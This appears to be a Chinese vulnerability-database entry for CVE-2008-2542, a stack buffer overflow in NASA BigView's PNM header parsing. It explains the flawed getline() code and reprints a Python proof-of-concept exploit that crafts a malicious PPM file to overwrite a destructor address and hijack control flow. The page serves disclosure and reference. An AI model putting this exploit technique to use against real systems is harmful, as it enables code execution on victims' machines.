NASA BigView PNM文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115349 漏洞类型 缓冲区溢出
发布时间 2008-06-04 更新时间 2008-06-04
CVE编号 CVE-2008-2542 CNNVD-ID CNNVD-200806-093
漏洞平台 Multiple CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/31872
https://www.securityfocus.com/bid/29517
https://cxsecurity.com/issue/WLB-2008060031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-093
|漏洞详情
BigView是NASA开发的图形查看器,可在运行Linux的桌面PC上将图形拉伸和缩放到任意尺寸。BigView在解析特制的PNM输入文件时存在栈溢出漏洞,攻击者可能利用此漏洞通过诱使用户处理恶意文件控制用户系统。以下是Ppm/ppm.C文件中的漏洞代码。这里getline()函数从文件将数据读取到缓冲区:/-----------418staticvoidgetline(intfin,char*lineBuf,intlen)419{420booldone=false;421intindex=0;422lineBuf[index]='';423while(!done){424lineBuf[index]=getOneChar(fin);425if(lineBuf[index]==10){426lineBuf[index]=0;427done=true;428}429++index;430}431lineBuf[index]=0;432}------------/函数要求了目标缓冲区的长度,但没有内部使用。在PPM::ppmHeader()函数中使用了上述函数来读取PPM文件的头:/-----------56PPM::ppmHeader(stringfilename,PPM::Format*format,57int*cpp,int*bpc,58int*sizeX,int*sizeY,59int*imageOffset)60{61std::ostringstreamerr;62charmagic[3],lineBuf[512],junk;63intres,max;...115while(junk==''){116getline(fin,lineBuf,512);117cout<<"Comment:"<118junk=getOneChar(fin);119}------------/栈上所分配的lineBuf缓冲区大小为512字节,如果PPM头中包含有大于512字节的行的话,就会触发栈溢出,导致拒绝服务或执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/29517/info

NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Successful attacks will compromise the application and underlying computer. Failed exploit attempts will result in a denial of service.

BigView 1.8 is vulnerable; other versions may also be affected. 

/-----------

## BigView exploit
## Alfredo Ortega - Core Security Exploit Writers Team (EWT)
## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06
Desktop i386

import struct
w = open("crash.ppm","wb")
w.write("""P3
#CREATOR: The GIMP's PNM Filter Version
1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""")
# This exploit is not trivial, because the function PPM::ppmHeader()
doesn't return inmmediately, and we must modify internal variables to
cause an overwrite of a C++ string destructor executed at the end of the
function to gain control of EIP
# PS.: Congrats for the Phoenix mars Lander!
for i in range(7):
                w.write(chr(i)*4)
w.write("AA")
w.write(struct.pack("<L",0xaaaaaaaa))
w.write(struct.pack("<L",0xbbbbbbbb))
w.write(struct.pack("<L",0xcccccccc))
w.write(struct.pack("<L",0x08080000))
w.write(struct.pack("<L",0x08080000)*48)

#The address of the destructor is hard-coded. Sorry but this is only a 
PoC!
destination = 0x0805b294 # destructor
value = 0x41414141 #address to jump to
w.write(struct.pack("<L",destination)) # destination

w.write("""
%d 300
255
255
255
255
""" % value)
w.close()

- -----------/
|受影响的产品
NASA Ames Research Center BigView 1.8
|参考资料

来源:XF
名称:bigview-getline-bo(42847)
链接:http://xforce.iss.net/xforce/xfdb/42847
来源:BUGTRAQ
名称:20080604CORE-2008-0425-NASABigViewStackBufferOverflow
链接:http://www.securityfocus.com/archive/1/archive/1/493112/100/0/threaded
来源:VUPEN
名称:ADV-2008-1745
链接:http://www.frsirt.com/english/advisories/2008/1745/references
来源:MISC
链接:http://www.coresecurity.com/?action=item&id=2304
来源:SREASON
名称:3924
链接:http://securityreason.com/securityalert/3924
来源:SECUNIA
名称:30546
链接:http://secunia.com/advisories/30546